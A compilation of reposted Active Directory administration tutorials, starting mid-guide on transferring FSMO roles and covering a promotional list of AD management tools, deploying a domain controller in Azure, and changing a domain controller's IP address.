  • InfrastructureMaster is on DC1
  • PDCEmulator is on DC2
  • RIDMaster is on DC2
  • DomainNamingMaster is on DC1
  • Schemamaster is on DC1

I want to move all the roles from DC2 to DC1, I’ll demonstrate this below.

Step 2: Transfer FSMO Roles

I’ll first demonstrate transferring roles with PowerShell, it is by far the easier option of the two (in my opinion).

You want to log into the server that you will be transferring the roles to, in my case it is DC1.

To move a role with PowerShell you will use the Move-ADDirectoryServerOperationMasterRole cmdlet, then the hostname of the server to transfer to.

Transfer PDCEmulator

Move-ADDirectoryServerOperationMasterRole -Identity "dc1" PDCEmulator

Transfer RIDMaster

Move-ADDirectoryServerOperationMasterRole -Identity "dc1" RIDMaster

Transfer InfrastrctureMaster

Move-ADDirectoryServerOperationMasterRole -Identity "dc1" Infrastructuremaster

Transfer DomainNamingMaster

Move-ADDirectoryServerOperationMasterRole -Identity "dc1" DomainNamingmaster

Transfer SchemaMaster

Move-ADDirectoryServerOperationMasterRole -Identity "dc1" SchemaMaster

Here is a screenshot of when I moved PDCEmulator and RIDMaster to DC1.

transfer fsmo roles with powershell

Now if I re-run the commands to list the FSMO roles I should see them all on DC1.

list fsmo roles again

Yes, I have confirmed all the roles are now on DC1. As you can see moving FSMO roles with PowerShell is very easy to do.

Now let’s see how to transfer FSMO roles using the Active Directory Users and Computers GUI.

Transfer FSMO Roles Using ADUC GUI

Just like PowerShell you need to log into the server that you will be transferring to. I’m transferring from DC2 to DC1 so I’ll log into DC1.

Open the Active Directory Users and Computers console, then right-click on the domain and click on operations masters.

move operations masters roles with GUI

You should now see a screen with three tabs (RID, PDC, and Infrastructure).

transfer RID role with gui

To transfer one of these roles just click on the change button. You can’t select which domain controller to transfer the role to, that is why you need to log into the server that you want to transfer to. if I wanted to transfer the RID role to DC3 I would log into that server.

To transfer the domain naming operations master role you will need to open Active Directory Domains and Trusts. Right-click on “Active Directory Domains and Trusts” and select “Operations Master”.

move operations master role with gui

Now click change to transfer the role to another DC.

moving roles

To transfer the schema master role follow these steps.

Open a command line and run the command regsvr32 schmmgmt.dll

register schmngmt.dll

Next, you need to open an MMC console. To do this click on start then type mmc. and click the icon.

open mmc console

Next, click File, then Add/Remove Snap-in

add remove to mmc console

Add “Active Directory Schema” from the list and click ok.

add active directory schema to mmc console

Right click on “Active Directory Schema” and change the domain controller to the server you want to transfer the role to.

In this example, I’ll change the domain controller to DC2.

Now you can right-click on Active Directory schema and select “Operations Master” to transfer the schema master role.

Confirm the role is changing to the correct DC and click the “change” button.

As you can see transferring FSMO roles with the GUI takes a lot of extra steps and that is why I prefer to use PowerShell. But if you are not into Powershell then the GUI works just fine.

Summary

Moving FSMO roles to another server is not a daily task but is necessary at times. Microsoft recommends the server be online when moving roles. The steps in this tutorial should help you when it comes time to move roles.

Source :
https://activedirectorypro.com/transfer-fsmo-roles/

Active Directory Tools and Management Software (2022 Update)

A list of the best Active Directory tools to help you simplify and automate Microsoft Active Directory management tasks.

The native Windows Administrative Tools are missing many features that administrators need to effectively do their jobs. Things like bulk operations and automation are just not possible with the Active Directory users and computer consoles.

The good news is there are many useful Active Directory Tools to choose from that can help you manage domain users, groups, and computers, generate reports, find security weaknesses, and more.

Check it out:

1. AD Bulk User Import

bulk user import tool

The Bulk Import tool makes it easy to import new user accounts into Active Directory from CSV. Includes a CSV template, sets multiple user attributes, and adds users to groups during the import. Automate the creation of new user accounts and simplify the user account provisioning process.

Key Features

  • Easily bulk import new accounts
  • Includes a CSV template
  • Logs the import process
  • Add users to groups during the import process

2. Active Directory Explorer

active directory explorer

Active Directory Explorer is a browser to navigate the AD database, objects, permissions, and schema objects within Active Directory. The interface is similar to Active Directory users and computers but allows you to view advanced settings. This is not a tool you would use on a daily basis, this would be used for very specific tasks such as viewing an object’s attributes and security sessions.

Another neat feature is the ability to save a snapshot of the AD database. You can then load it for offline viewing and explore it like it was a live database. Again not a common use case.

Key Features

  • Easily explore the Active Directory database
  • View all object attributes
  • View the Active Directory Schema
  • Take a snapshot of the Database and view offline

3. Adaxes

adaxes

Adaxes is a premium product that automates many AD management tasks, like user provisioning, assigning permissions, creating mailboxes, delegation, and much more. All management tasks are done from a web interface and can be accessed from laptops, tablets, and phones. The web interface is fully customizable so you can view just want you to need. Also includes a user self service portal and a password self service portal.

Key Features

  • Roles based access control
  • Fully automate AD tasks
  • Web interface

4. User Export Tool

user export tool

The user export tool lets you export all uses plus all common user fields to a CSV. Over 40 user fields can be added to the export by clicking the change columns button. This is a great tool if you need a report of all users, the groups they are a member of, OU, and more.

Key Features

  • Find users TRUE last logon date from all domain controllers
  • Export report to a CSV file
  • Filter and search columns
  • Easy to report on OUs or groups

5. Bulk User Updater

bulk updater

This tool lets you bulk update user account properties from CSV file. Some popular use cases are bulk updating user’s proxyaddresses, employeeid, addresses, manager, addresses, state, country, and so on.

All changes are sent to a log file which lets you keep track of changes and check for errors. This is a very popular tool!

Key Features

  • Bulk update user account properties
  • Includes CSV template
  • Logs changes and errors
  • Saves a lot of time

6. AD Cleanup Tool

ad cleanup tool

The AD Cleanup tool searches your domain for stale and inactive user accounts based on the account’s lastlogon attribute. You can also find disabled, expired, accounts that have never been used and empty groups.

It is recommended to run a cleanup process on your domain at least once a month, this tool can help simplify that cleanup process and secure your domain.

Key Features

  • Quickly find old user and computer accounts
  • Limit the scope to OUs and groups
  • Bulk move and disable old accounts
  • Find all expired user accounts

7. SolarWinds Server & Application Monitor

solarwinds sam

This utility was designed to Monitor Active Directory and other critical services like Azure, DNS, and DHCP. It will quickly spot domain controller issues, replication, performance issues with cloud services, failed logon attempts, and much more.

This is a premium tool that has a big price tag but it’s an incredible product. You can monitor all resources including applications, hardware, processes, and cloud systems. Everything is accessed from a single web console, you can get email alerts based on various thresholds.

Key Features

  • Customizable dashboard
  • Email alerts
  • 1200 out of box templates
  • Diagnose AD replication issues
  • Monitor account logins

SolarWinds Server Monitor provides a fully functional 30-day free trial.

8. Active Directory Health Monitor

ad heatlh monitor

If you want a simple tool to monitor your Active Directory services then this is a great tool.

Check the health of your domain controllers with this easy to use tool. Runs 27 health checks on your servers to check for critical errors. Click on any failed test to quickly see the details.

Also includes an option to test DNS and check event logs for critical events.

Key Features

  • Quickly check domain controller health
  • Check DNS health
  • Very easy to use
  • Export report to csv file

9. User Unlock and Lockout Troubleshooter

troubleshoot account lockouts

Find all locked users with the click of a button. Unlock, reset passwords or show advanced details like the source of the lockout and more. To pull the source computer you need to have auditing enabled, check the administrator guide for how to enable this.

Key Features

  • Find the source of account lockouts
  • Fast and easy to use
  • Unlock multiple accounts at once
  • Reset and unlock accounts from a single interface

10. Bulk Group Membership Updater

group membershi updater

Bulk add or remove users to Active Directory groups. You can bulk add users to a single group or multiple groups all at once. Very easy to use and saves a lot of time. Just add the users to the CSV template and the name of the group or groups you want to add them to.

Key Features

  • Easily bulk add users to groups
  • Bulk remove users from groups
  • Add groups to groups

11. Last Logon Reporter

user last logon reporter

The last logon reporter will get the user’s TRUE last logon time from all domain controllers in your domain. You can limit the search to the entire domain, organizational unit, or groups.

12. AD FastReporter

ad fast reporter

AD FastReporter has a large list of pre-built reports to pick from. Report on users, computers, groups, contacts, printers, group policy objects, and organizational units. Very easy to use but does have an older style interface.

Here is a small example of the reports you can run:

  • All users
  • Deleted Users
  • Users with a home directory
  • users without logon script
  • All computers
  • All domain controllers
  • Computers created in the last 30 days
  • Users created in the last 30 days

13. Local Group Report

local group manager

This tool gets the local groups and group members on remote computers. You can quickly sort or filter the groups to get a list of all users and groups that have local administrator rights.

Click here to watch a demo.

Key Features

  • Easily get group membership on remote computers
  • Quickly find how as administrator rights
  • Filter for any group or member

14. Group Membership Report Tool

get users group membership

Report and export group membership has never been easier, select from the entire domain, groups, or organizational unit. This tool also helps to find nested security groups.

Key Features

  • The fastest way to get all domain gruops and group membership
  • Export report to a CSV
  • Limit scope to an OU or group

15. Dovestones AD Reporting

dovestones ad reporting

Dovestones AD Reporting tool contains a large number of pre built reports. You can customize the report by selecting user attributes and defining which users to export.

16. Computer Uptime Report

computer uptime

Get the uptime and last boot of remote computers. Report on the entire domain or select from an OU or group.

Very helpful during maintenance days to verify if computers have rebooted.

17. SolarWinds Permissions Analyzer

solarwinds permissions analyer

This FREE tool lets you get instant visibility into user and group permissions. Quickly check user or group permissions for files, network, and folder shares.

Analyze user permissions based on an individual user or group membership.

Download Free Tool

18. NTFS Permissions Reporter

ntfs permissions tool

The NTFS permissions tool will report folder security for local, remote, and UNC folder permissions. The grid view comes with a powerful filter so you can search and limit the results to find specific permissions such as Active Directory groups.

19. Windows PowerShell

Windows PowerShell is a very powerful tool that can automate many Active Directory and Windows tasks. The problem is it can be complex to learn some of the advanced functions. With that said there are plenty of cmdlets that can be used in a single line of code to do some pretty cool things in Windows.

  • Create new user account: New-Aduser
  • Create computer account: New-ADComputer
  • Create a security group: New-ADGroup
  • Create a organizational unit: New-ADOrganizationalUnit
  • Get domain details: Get-ADDomin
  • Get domain password policy: Get-ADDefaultDomainPasswordPolicy
  • Get group policy: get-GPO -all
  • Get all services: get-service
  • Find locked user accounts: Search-ADAccount -LockedOut

20. Windows sysinternals

windows sysinternals

The Sysinternals is a suite of small GUI programs and command line utilities designed to troubleshoot and diagnose your Windows systems and applications. They are all portable, which means you don’t need to install them, you can just run the exe or commands with no installation required.

These utilities were created way back in 1996 by Mark Russinovich and then later acquired by Microsoft. There are a bunch of tools included I will list some of the popular ones.

  • Process Monitor – Shows real time file system, registry and process activity.
  • PsExec – Lets you execute programs on a remote system
  • PsKill – Kill local and remote processes
  • Sysmon – Logs system activity about process creations, network connection and changes to files
  • Psinfo – Shows info about a local or remote computer

All-in-one Active Directory Toolkit

Our AD Pro Toolkit includes 12 Active Directory tools in a single interface.

Tools included in the AD Pro Toolkit:

  • Bulk User Import
  • Bulk User Updater
  • AD Cleanup Tool
  • Last Logon Reporter
  • User Export to CSV
  • Unlock and Account Troubleshooter
  • Group Reporter
  • Group Management Tool
  • NTFS Permissions Report
  • Local Group Management
  • AD Health Monitor
  • Uptime last boot

Download a Free trial of the AD Pro Toolkit

What are the benefits of Active Directory Tools?

The main benefit is it will save you time and make managing Active Directory easier. One of the most popular tasks of working with Active Directory is to create new user accounts. The built-in tools provide no options for bulk importing new accounts so it becomes very time-consuming. With the AD Pro Toolkit you can easily bulk import, bulk update, and disable user accounts.

Below is a picture of how you would create an account with the built-in (ADUC) Active Directory Users and Computers console. Everything has to be manually entered and you have to go back and add users to groups.

Using Active Directory tools like the AD Bulk Import tool, you can bulk import thousands of accounts at once. Plus you can automatically set user accounts fields and add users to groups. Let me show you how easy it is.

Step 1: Fill out the provided CSV template.

The template includes all the common user fields you need to create a new account. Just fill out what you need and save the file.

Step 2: Import new account

With this tool just select your CSV file and click run. This will import all of the account information from the CSV and automatically bulk create new Active Directory user accounts.

You can watch the import process and when complete you have a log file of the import.

You will at some point be asked to export users to a CSV and again there is no easy built in option for this. When I was an administrator at a large organization I would get this request at least once a week and it was a pain. When I developed the user export tool this process became so easy I was able to have other staff members take it over.

The above picture is from the user export tool. This tool lets you easily export all users from the entire domain, an OU, or a group.

The ease of use is another benefit as many people don’t have time to learn PowerShell. PowerShell is a great tool and can do many things but it can be complex and time-consuming to learn. The AD Pro Toolkit has a very simple interface and you can start using it right away to perform many advanced tasks in your domain.

Frequently Asked Questions

Below are questions and answers regarding the AD Pro Toolkit.

Does the AD Pro Tool support multiple domains?

Yes. It will auto-detect your domains based on current credentials. You can click the domain button to change authentication and connect to other domains or domain controllers.

Do you have a tool to help with account lockouts?

Yes, the user unlock tool can quickly display all locked users and the source of the lockout.

What is required to use the toolkit?

To create and bulk modify users you will need these rights in your Active Directory domain. This is often done by putting your account in the domain administrator group but can also be done by delegating these rights. Some tools like the last logon reporter, export, and group membership require no special permissions.

Do I need to know PowerShell or scripting?

No. All tools are very easy to use and require no scripting or PowerShell experience.

Is there a way to bulk update the manager, telephone numbers, and other user fields?

Yes, this is exactly what the bulk updater tool was created for. You can easily bulk update from a large list of user fields.

Can I bulk export or import on a scheduled task?

We are working on this right now. AD Cleanup, bulk import, update, and export tools will include an option to run on a scheduled task or from a script.

I was just hired and Active Directory is a mess. Can the Pro toolkit help?

The AD Cleanup tool can help you find old user and computer accounts and bulk disable or move them. We have many customers that use this tool to cleanup their domain environments.

Source :
https://activedirectorypro.com/tools/

How to Deploy a Domain Controller in Azure

In this guide, I will demonstrate how to deploy a domain controller in Azure.

Deploying a Domain Controller in Azure can be used to add additional Domain Controllers to your on-premises environment. It’s also an easy way to create an Active Directory test lab.

Note: The VM I create in this demo is for testing, the settings are not optimal for a production domain controller. If you want to deploy a Domain Controller in Azure for production you will need to determine the right settings for your organization, such as VM size (CPU, Mem), redundancy options, disks, and network settings, all of which will increase the cost.

Tip #1: For a production DC, DO NOT give it a public IP or allow public inbound ports.

Tip #2: To add an azure domain controller to your on-premises environment you will need a VPN tunnel from your network to Azure. I will go over this in a separate guide.

Tip #3: For production, the Azure virtual network must not overlap your on-premises network. For testing, it doesn’t matter (assuming you will not be connecting to your on-premises network).

Let’s get started.

Part 1: Create a Virtual Machine

If you don’t have an Azure account you can create one for free. Microsoft gives you a $200 Azure credit for 30 days. This is plenty of credits to create several VMs and use other Azure resources.

Step 1. Sign in to your azure portal, https://portal.azure.com

Step 2. Click on “Virtual machines”

select virtual machines

Step 3. Click on Create and select “Azure virtual machine”

Step 4. Enter basic information for the new VM

  • Subscription: Select the subscription you want to use for the VM.
  • Resource group: Select an existing or create a new resource group.
  • Virtual machine name: Give your VM a name.
  • Region: Choose your region, you typically want a region that is close to you.
  • Availability options: This is for redundancy and will ensure your VMs are still running if one Azure data center has a failure. You want this for production VMs. I’m just creating a test VM so I’ll choose “No infrastructure redundancy required.”
  • Security Type: I’ll choose Standard.
  • Image: Pick the OS you want to use, I’ll pick “Windows Server 2019 Datacenter”.
  • Size: You will need to determine the size of VM you need. For testing reasons, I’ll choose a small VM to keep costs low.
  • Username and password: This will be the administrator account for the VM.
  • Public inbound ports: For production, you want this set to “none”. For testing, I’ll leave RDP open.
  • Licensing: If you have an existing license you can use select the box, this can save money on each VM.

Here is a screenshot of the Basics settings for my VM.

virtual machine basic settings

Now click Next to go to the Disks page.

Step 5. Enter disk details for the VM.

Determine the disk type to use, for testing I use the standard HDD.

virtual machine disk settings

Click next to go to networking.

Step 6. Network settings

  • Virtual network: Select an existing or create a new virtual network.
  • Subnet: Select or create a subnet.

You create a virtual network and then use subnetting to segment the address space. For example, I’m using the 10.1.0.0/16 address space then I segment 10.1.10.0/24 (256 addresses) with subnetting. I’ll use the 10.1.10.0/24 subnet block for my servers.

virtual machine create virtual network
  • Public IP: A public IP will be added automatically. For testing, this is OK, for production set this to none.
  • NIC network security group: This is s stateful firewall for your virtual network. I’ll choose standard.
  • Public inbound ports: For production, you want to select none. For testing, you can use RDP to access the VM.
virtual machine network inbound ports

Click next to “Management”

Step 7: Management Settings

The only thing I want to point out on this page is the “Auto-shutdown” option. For testing with Azure, this is a great feature to help save costs. You get charged for the VM running even if you are not using it. I’m not going to be using this test domain controller 24/7 so I’ll have it auto shut down at 7:00 PM each night. Do not do this for a production domain controller.

virtual machine auto shutdown

Step 8: Click Review + create

Microsoft will validate your settings and show any warnings or settings that were missed. You will also get a cost estimate but keep in mind it is just an estimate.

virtual machine validation check

When ready click the “Create” button to create the VM.

You will get a progress page so you can watch the status of the deployment. It took about 5 minutes for my VM to be created.

virtual machine deployment completed

Part 2: Configure VM with Static IP Addresses

Domain controllers need a static IP address and the DNS pointing to itself. For on-premises DCs you would just go into the NIC settings and manually configure the IP settings. With Azure VMs it’s recommended to set this at the Virtual Network Interface.

Go to VM Networking settings.

In the right-hand menu for your VM under settings click on “Networking”.

configure vm static ip

Now click on the Network Interface for the VM (You will have a different name).

virtual network network interface

Next click on “IP Configurations” in the left menu under settings.

Next click on “ipconfig1” under IP configurations.

ip configuration

Change the IP from “Dynamic” to “Static” and enter the IP address you want the domain controller to have, it must be an IP from the subnet you assigned to your virtual network. I’ll give my DC the IP address 10.1.10.10.

set static ip address on vm

Click “Save”. The network interface will be restarted to set the IP address.

Go back to the Network Interface and click on “DNS servers”.

network interface dns settings

Set the DNS server to the IP address of the domain controller.

set dns servers for nic

Now on the VM, your server should be configured with the settings from above. Below I run ipconfig /all to verify my IP settings.

ipconfig for virtual machine

Part 3: Install Active Directory Domain Services

With a VM created and the IP settings configured we can move forward with installing Active Directory on the server. If you have installed ADDS before this is not new, it’s the same as installing it on an on-premises server.

Go to the server manager and click on “Add roles and features”

server manager add roles

Before you begin – click “Next”.

Installation type – select “role based” and click “Next”.

Server Selection – select the hostname of your server and click “Next”.

Server Roles – select “Active Directory Domain Services”.

You will get a pop-up to add additional features. Click “Add Features”.

install active directory domain services

Click “Next”.

Features – no features need to be added so click “Next”.

AD DS – Click “Next”.

Confirmation – Click “Install”.

The installation will start.

When finished click the yellow icon in the upper right corner and click on “Promote this server to a domain controller”.

promote to domain controller

Deployment Configuration

I’m creating a new domain so I’m going to pick “Add a new forest”. If you’re adding another DC to your existing domain you would pick the first option “Add a domain controller to an existing domain”.

domain controller deployment config

Domain Controller Options

For a new test domain, the default settings are good. Add a DSRM password and click next.

domain controller options

DNS Options

Click next on this screen.

Additional Options

Enter a NetBIOS name and click “Next”

netbios domain name

Paths

I always leave these as default settings

Review Options

Review your settings and click “Next”

Prerequisites Check

If the Prerequisites pass click on “Install”

deployment check

When done installing the server will reboot and will now be a domain controller.

domain controller install completed.

Nice work. If you followed along you should now have a domain controller running in the Azure cloud.

You can now deploy additional Azure VMs and connect them to this domain controller. You can also use this domain controller to add additional DCs to your on-premises environment.

Part 4: Additional Settings and Tips

Here are a few additional settings and tips I recommend.

  1. You will need to create a new site in Active Directory Sites & Services with the new subnet.
  2. You should adjust the domain controller DNS settings for redundancy.
  3. A VPN tunnel is required from your on-premises network to Azure.
  4. If you are testing and use a public IP with open ports (RDP 3389), then I recommend using fake/dummy data in Active Directory. Their server might get comprised due to the internet exposure so don’t use real data such as real usernames and passwords.
  5. You can use the Azure firewall to limit access to the VM from your IP address.
  6. Use Bastion for secure remote connectivity.
  7. Explore the many options that Azure has to offer, it’s very impressive everything it has to offer.

Do you plan to use domain controllers running in Azure? Let me know in the comments below.

Resources

Recommended Tool: Permissions Analyzer for Active Directory

This FREE tool lets you get instant visibility into user and group permissions and allows you to quickly check user or group permissions for files, network, and folder shares.

You can analyze user permissions based on an individual user or group membership.

This is a Free tool, download your copy here.

8 thoughts on “How to Deploy a Domain Controller in Azure”

Source :
https://activedirectorypro.com/deploy-domain-controller-azure/

Change IP Address on Domain Controller

In this post, I will demonstrate how to change the IP address on a domain controller.

Before you change the IP address it is very important to run through a checklist. Any changes to a domain controller can disrupt services and impact business operations. See my checklist below.

For this demonstration, I have the following settings.

  • DC1, IP Address 192.168.100.10
  • DC2, IP Address 192.168.100.11
  • DC3, IP Address 192.168.100.12

I’m going to change the IP on DC2 to 192.168.100.15. If you are changing to a different subnet there are additional things to consider that I go over in the checklist.

Pre-Change Checklist

I recommend reviewing each item on this checklist before making changes. I’ve migrated many domain controllers from small to large networks and these steps have been a lifesaver. If you do this often you will probably come up with your own checklist.

Do You Have Multiple Domain Controllers?

It is best practice to have multiple domain controllers and backup Active Directory for disaster recovery reasons. I do not recommend making major changes to domain controllers if you have a single domain controller. If you have multiple DCs and the change breaks the server you can still operate from a secondary DC.

You can get a list of all domain controllers in your domain with this command:

Get-ADDomainController -filter * | select hostname, domain, forest

Check FSMO Roles

Does the DC hold any FSMO roles? Easily check with this command:

netdom query fsmo

Below you can see all my FSMO roles are on DC1.

To help avoid disruption to authentication services you could move the FSMO roles to another domain controller that is on the same site. Keep in mind you would need to move any services that are manually configured to the server.

I’m making changes to DC2 which has no FSMO roles running on it.

Check Installed Roles and Features

I recommend checking what services are running on the server, you don’t want to change the IP and then have something break because you didn’t know it was a DHCP server or a web server.

  • Check the control panel for installed software
  • Check the installed roles and features

You can quickly check the installed roles and features with this command:

Get-WindowsFeature | Where-Object {$_. installstate -eq "installed"}

Below you can see my DC2 server has some critical services running on it including DHCP and DNS. I’ll need to consider this when changing IP addresses.

Find Devices Pointing to the Domain Controller with Wireshark

Wireshark can help you identify what systems are pointing to your domain controller for various services like DNS, DHCP, and so on. This might be the most important pre-change step.

Useful Wireshark filters:

  • dns
  • dhcp
  • ldap
  • DCERPC

Here is an example:

The packet capture shows that system 192.168.100.22 is using DC2 for DNS. I’ve done a large migration of domain controllers before and used Wireshark to help identify systems that are still pointing to old domain controllers. From experience, you will probably be surprised at how many systems are hardcoded to your DCS.

Check Domain Controller Health

You need to check that your domain controller is healthy before making the change. Any issues could result in replication issues, DNS issues, and so on. I’ve got a complete guide on how to use dcdiag its actually very easy to use. Just open the command prompt on your server and run the command.

dcdiag

Check The Health of DNS

By default, dcdiag does not test DNS. Use this command to run a complete test on DNS.

dcdiag /test:dns /v

Make sure the server passes all tests and the name resolution SRV record is registered.

Run Best Practice Analyzer

The best practice analyzer can find configuration issues according to Microsoft best practices. The BPA tool is not always accurate so you need to double check its findings. Also, any errors or warnings do not mean your migration will fail. It can just help you find any major misconfigurations according to Microsoft best practices.

Here is a scan from my DC2.

I’ve got a warning that the loopback address is not included on the ethernet adapter settings. The best practice is to point the preferred DNS server to another DNS server (not itself).

Here is an example of how it should be configured:

My DC2 IP address is 192.168.100.11. You can see I set the preferred DNS to another domain controller (DC1) and the alternate is set to the loopback address. This is Microsoft’s best practice.

Again any warnings or errors the best practice analyzer finds doesn’t mean your migration will fail. But to help avoid any potential migration issues I recommend running this tool and reviewing the scan results. It might even fix some issues you weren’t aware of.

Are You Changing Subnets?

If you will be changing to a new subnet then consider the following:

  • If the server also runs DHCP you will need to update the helper address on your switch or firewall.
  • Add the new subnet to Active Directory sites and services.

Check Firewall Rules

Are there any firewall rules that will need to be updated? This could be your network firewall and windows based firewalls. I typically have rules on the network firewall that limit network access for critical servers like domain controllers. I would need to update the firewall rules to permit traffic to the new DC IP.

Plan & Schedule the IP Change

I recommend making this type of change during your maintenance window. No matter how much you prepare for changes there is always a potential for something going wrong. You need to have a maintenance window to allow time to resolve any issues. Don’t forget to communicate these changes with your team ahead of time.

How to Change the IP Address of a Domain Controller:

Here are the steps to changing the IP Address on a domain controller.

  1. Log on locally to the server (console access, don’t RDP or use remote access).
  2. Change NIC TCP/IP settings
    1. Change IP Address
    2. Change subnet mask (if required)
    3. Change Default gateway (if required)
    4. Preferred DNS server (should point to another DC in the same site)
    5. Alternate DNS server (should be the loopback address 127.0.0.1)
  3. After changing the IP run ipconfig /flushdns to remove local cache
  4. Run ipconfig /registerdns to ensure the new IP is registered by the DNS server
  5. Run dcdiag /fix to ensure service records are registered.

Video Tutorial

https://youtube.com/watch?v=4R942B54cEE%3Ffeature%3Doembed

Done. Nice work!

Post Change Checklist:

  • Update DHCP settings if DC server is also DNS server
  • If subnet address changed then make sure AD Sites and services is updated
  • Update clients that use static ip address
  • Update other DCs nic settings (if needed)
  • Run commands dcdiag and dcdiag /test:dns /v to check for issues.
  • Verify DNS is working, you can do this with nslookup.
  • Test authenticating to the DC. You can do this by manually settings a client IP DNS settings to the IP of the DC or using PowerShell and specify the authentication server.
  • Continue to monitor old IP with wireshark – This can be done by a span port or assign the DCs old IP to a computer with wireshark installed. This is useful to help find systems that are still using the old IP of the DC.
  • Update firewall rules if needed.
  • If a client system is having issues try to flush the local dns cache with ipconfig /flushdns command
  • Changing the IP address on the DC should not effect any shares on the server as long as DNS is updated.

Summary

In this post, I showed you how to change the IP address on a domain controller. I also showed you a checklist I go through before changing the IP address. Authentication, DNS, and DHCP services are critical so it’s very important to plan and review as much as you can before making changes to these critical services. Also, all organizations and networks are different so over time you may have a different checklist than mine.

Recommended Tool: Permissions Analyzer for Active Directory

This FREE tool lets you get instant visibility into user and group permissions and allows you to quickly check user or group permissions for files, network, and folder shares.

You can analyze user permissions based on an individual user or group membership.

This is a Free tool, download your copy here.

2 thoughts on “Change IP Address on Domain Controller”

Source :
https://activedirectorypro.com/change-ip-address-on-domain-controller/